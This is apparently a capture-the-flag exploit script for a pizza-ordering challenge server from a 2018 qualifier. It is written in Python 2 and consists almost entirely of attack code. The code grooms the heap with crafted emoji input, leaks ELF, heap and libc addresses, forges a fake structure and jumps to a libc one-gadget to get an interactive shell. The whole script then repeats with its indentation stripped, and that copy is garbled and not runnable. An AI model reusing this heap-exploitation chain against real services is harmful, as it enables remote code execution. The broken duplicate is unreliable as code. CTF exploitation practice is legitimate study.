ymgve/its_me_mario.py

## its_me_mario.py
import socket, struct, os, binascii, base64
import telnetlib

from pow import *

def readline(sc, show = True):
    res = ""
    while len(res) == 0 or res[-1] != "\n":
        data = sc.recv(1)
        if len(data) == 0:
            print repr(res)
            raise Exception("Server disconnected")
        res += data

    if show:
        print repr(res[:-1])
    return res[:-1]

def read_until(sc, s):
    res = ""
    while not res.endswith(s):
        data = sc.recv(1)
        if len(data) == 0:
            print repr(res)
            raise Exception("Server disconnected")
        res += data

    return res[:-(len(s))]

def read_all(sc, n):
    data = ""
    while len(data) < n:
        block = sc.recv(n - len(data))
        if len(block) == 0:
            print repr(data)
            raise Exception("Server disconnected")
        data += block

    return data

def I(n):
    return struct.pack("<I", n)

def Q(n):
    return struct.pack("<Q", n)

puts_offset = 0x6f690
shell_offset = 0x4526a

# sc = socket.create_connection(("10.0.0.49", 12345))

sc = socket.create_connection(("83b1db91.quals2018.oooverflow.io", 31337))
readline(sc)
chall = readline(sc).split(": ")[1]
n = int(readline(sc).split(": ")[1])
res = solve_pow(chall, n)
print res
sc.send(str(res) + "\n")

sc.send("N\n")
sc.send("goodpizza\n")
sc.send("O\n")
sc.send("1\n")
sc.send("1\n")
sc.send("x\n")
sc.send("L\n")

sc.send("N\n")
sc.send("badpizza\n")
sc.send("O\n")
sc.send("17\n")
for i in xrange(16):
    sc.send("2\n")
    sc.send("\xe0\xf0\x9f\n")
    sc.send("\x8d\x8d\n")

sc.send("1\n")
sc.send("\xf0\x9f\x8d\x85\n")

sc.send("C\n")
sc.send("q" * 47 + "\n")
sc.send("Y\n")

sc.send("L\n")
sc.send("goodpizza\n")
sc.send("C\n")
sc.send("q\n")
sc.send("L\n")

sc.send("W\n")

read_until(sc, "this is what he had to say: ")
addr = readline(sc, False).ljust(8, "\x00")
elfaddr = struct.unpack("<Q", addr)[0]
print hex(elfaddr)

sc.send("N\n")
sc.send("goodpizza2\n")
sc.send("O\n")
sc.send("1\n")
sc.send("1\n")
sc.send("x\n")
sc.send("L\n")

sc.send("N\n")
sc.send("badpizza2\n")
sc.send("O\n")
sc.send("17\n")
for i in xrange(16):
    sc.send("2\n")
    sc.send("\xe0\xf0\x9f\n")
    sc.send("\x8d\x8d\n")

sc.send("1\n")
sc.send("\xf0\x9f\x8d\x85\n")

sc.send("C\n")
sc.send("q" * 31 + "\n")
sc.send("Y\n")

sc.send("L\n")
sc.send("goodpizza2\n")
sc.send("C\n")
sc.send("q\n")
sc.send("L\n")

sc.send("W\n")

read_until(sc, "this is what he had to say: ")
addr = readline(sc, False).ljust(8, "\x00")
heapaddr = struct.unpack("<Q", addr)[0]
print hex(heapaddr)

sc.send("N\n")
sc.send("badpizza3\n")
sc.send("O\n")
sc.send("17\n")
for i in xrange(16):
    sc.send("2\n")
    sc.send("\xe0\xf0\x9f\n")
    sc.send("\x8d\x8d\n")

sc.send("1\n")
sc.send("\xf0\x9f\x8d\x85\n")
sc.send("L\n")

sc.send("N\n")
sc.send("goodpizza3\n")
sc.send("O\n")
sc.send("3\n")
sc.send("1\n")
sc.send("\xf0\x9f\x8d\x85\n")
sc.send("1\n")
sc.send("\xf0\x9f\x8d\x85\n")
sc.send("1\n")
sc.send("\xf0\x9f\x8d\x85\n")
sc.send("C\n")
sc.send("q" * 1 + "\n")
sc.send("L\n")

sc.send("L\n")
sc.send("badpizza3\n")
sc.send("C\n")
sc.send("q" * 1 + "\n")

sc.send("P\n")

#ss = Q(elfaddr - 0x20bbe0 + 0x181a) + Q(heapaddr + 0x13b0) + "222222223333333344444444" + Q(heapaddr + 0x13b8) + "66666666777777778888888899999999aaaaaaaabbbbbbb"
ss = Q(heapaddr + 0x13a0) + Q(elfaddr - 0x20bbe0 + 0x20bea8) + Q(elfaddr - 0x20bbe0 + 0x1c28) + "33333333" + Q(heapaddr + 0x1390) + Q(heapaddr + 0x13c8) + Q(heapaddr + 0x13c8) + Q(heapaddr + 0x13d0) + Q(elfaddr - 0x20bbe0 + 0x181a) + "99999999aaaaaaaabbbbbbb"
assert len(ss) == 95

sc.send(ss + "\n")

sc.send("L\n")
sc.send("goodpizza3\n")
sc.send("A\n")

read_until(sc, "Admire these beauties...")
read_until(sc, "ApprovedPizza: ")
addr = readline(sc, False).ljust(8, "\x00")
libcaddr = struct.unpack("<Q", addr)[0]
libcbase = libcaddr - puts_offset
print hex(libcbase)

sc.send(Q(heapaddr + 0x13d0) + Q(libcbase + shell_offset) + "ffffffffgggggggghhhhhhhhiiiiiiii" + "\n")


t = telnetlib.Telnet()
t.sock = sc
t.interact()

while True:
    data = sc.recv(16384)
    if len(data) == 0:
        break
    for line in data.split("\n"):
        print repr(line)
	import socket, struct, os, binascii, base64
	import telnetlib

	from pow import *

	def readline(sc, show = True):
	res = ""
	while len(res) == 0 or res[-1] != "\n":
	data = sc.recv(1)
	if len(data) == 0:
	print repr(res)
	raise Exception("Server disconnected")
	res += data

	if show:
	print repr(res[:-1])
	return res[:-1]

	def read_until(sc, s):
	res = ""
	while not res.endswith(s):
	data = sc.recv(1)
	if len(data) == 0:
	print repr(res)
	raise Exception("Server disconnected")
	res += data

	return res[:-(len(s))]

	def read_all(sc, n):
	data = ""
	while len(data) < n:
	block = sc.recv(n - len(data))
	if len(block) == 0:
	print repr(data)
	raise Exception("Server disconnected")
	data += block

	return data

	def I(n):
	return struct.pack("<I", n)

	def Q(n):
	return struct.pack("<Q", n)

	puts_offset = 0x6f690
	shell_offset = 0x4526a

	# sc = socket.create_connection(("10.0.0.49", 12345))

	sc = socket.create_connection(("83b1db91.quals2018.oooverflow.io", 31337))
	readline(sc)
	chall = readline(sc).split(": ")[1]
	n = int(readline(sc).split(": ")[1])
	res = solve_pow(chall, n)
	print res
	sc.send(str(res) + "\n")

	sc.send("N\n")
	sc.send("goodpizza\n")
	sc.send("O\n")
	sc.send("1\n")
	sc.send("1\n")
	sc.send("x\n")
	sc.send("L\n")

	sc.send("N\n")
	sc.send("badpizza\n")
	sc.send("O\n")
	sc.send("17\n")
	for i in xrange(16):
	sc.send("2\n")
	sc.send("\xe0\xf0\x9f\n")
	sc.send("\x8d\x8d\n")

	sc.send("1\n")
	sc.send("\xf0\x9f\x8d\x85\n")

	sc.send("C\n")
	sc.send("q" * 47 + "\n")
	sc.send("Y\n")

	sc.send("L\n")
	sc.send("goodpizza\n")
	sc.send("C\n")
	sc.send("q\n")
	sc.send("L\n")

	sc.send("W\n")

	read_until(sc, "this is what he had to say: ")
	addr = readline(sc, False).ljust(8, "\x00")
	elfaddr = struct.unpack("<Q", addr)[0]
	print hex(elfaddr)

	sc.send("N\n")
	sc.send("goodpizza2\n")
	sc.send("O\n")
	sc.send("1\n")
	sc.send("1\n")
	sc.send("x\n")
	sc.send("L\n")

	sc.send("N\n")
	sc.send("badpizza2\n")
	sc.send("O\n")
	sc.send("17\n")
	for i in xrange(16):
	sc.send("2\n")
	sc.send("\xe0\xf0\x9f\n")
	sc.send("\x8d\x8d\n")

	sc.send("1\n")
	sc.send("\xf0\x9f\x8d\x85\n")

	sc.send("C\n")
	sc.send("q" * 31 + "\n")
	sc.send("Y\n")

	sc.send("L\n")
	sc.send("goodpizza2\n")
	sc.send("C\n")
	sc.send("q\n")
	sc.send("L\n")

	sc.send("W\n")

	read_until(sc, "this is what he had to say: ")
	addr = readline(sc, False).ljust(8, "\x00")
	heapaddr = struct.unpack("<Q", addr)[0]
	print hex(heapaddr)

	sc.send("N\n")
	sc.send("badpizza3\n")
	sc.send("O\n")
	sc.send("17\n")
	for i in xrange(16):
	sc.send("2\n")
	sc.send("\xe0\xf0\x9f\n")
	sc.send("\x8d\x8d\n")

	sc.send("1\n")
	sc.send("\xf0\x9f\x8d\x85\n")
	sc.send("L\n")

	sc.send("N\n")
	sc.send("goodpizza3\n")
	sc.send("O\n")
	sc.send("3\n")
	sc.send("1\n")
	sc.send("\xf0\x9f\x8d\x85\n")
	sc.send("1\n")
	sc.send("\xf0\x9f\x8d\x85\n")
	sc.send("1\n")
	sc.send("\xf0\x9f\x8d\x85\n")
	sc.send("C\n")
	sc.send("q" * 1 + "\n")
	sc.send("L\n")

	sc.send("L\n")
	sc.send("badpizza3\n")
	sc.send("C\n")
	sc.send("q" * 1 + "\n")

	sc.send("P\n")

	#ss = Q(elfaddr - 0x20bbe0 + 0x181a) + Q(heapaddr + 0x13b0) + "222222223333333344444444" + Q(heapaddr + 0x13b8) + "66666666777777778888888899999999aaaaaaaabbbbbbb"
	ss = Q(heapaddr + 0x13a0) + Q(elfaddr - 0x20bbe0 + 0x20bea8) + Q(elfaddr - 0x20bbe0 + 0x1c28) + "33333333" + Q(heapaddr + 0x1390) + Q(heapaddr + 0x13c8) + Q(heapaddr + 0x13c8) + Q(heapaddr + 0x13d0) + Q(elfaddr - 0x20bbe0 + 0x181a) + "99999999aaaaaaaabbbbbbb"
	assert len(ss) == 95

	sc.send(ss + "\n")

	sc.send("L\n")
	sc.send("goodpizza3\n")
	sc.send("A\n")

	read_until(sc, "Admire these beauties...")
	read_until(sc, "ApprovedPizza: ")
	addr = readline(sc, False).ljust(8, "\x00")
	libcaddr = struct.unpack("<Q", addr)[0]
	libcbase = libcaddr - puts_offset
	print hex(libcbase)

	sc.send(Q(heapaddr + 0x13d0) + Q(libcbase + shell_offset) + "ffffffffgggggggghhhhhhhhiiiiiiii" + "\n")


	t = telnetlib.Telnet()
	t.sock = sc
	t.interact()

	while True:
	data = sc.recv(16384)
	if len(data) == 0:
	break
	for line in data.split("\n"):
	print repr(line)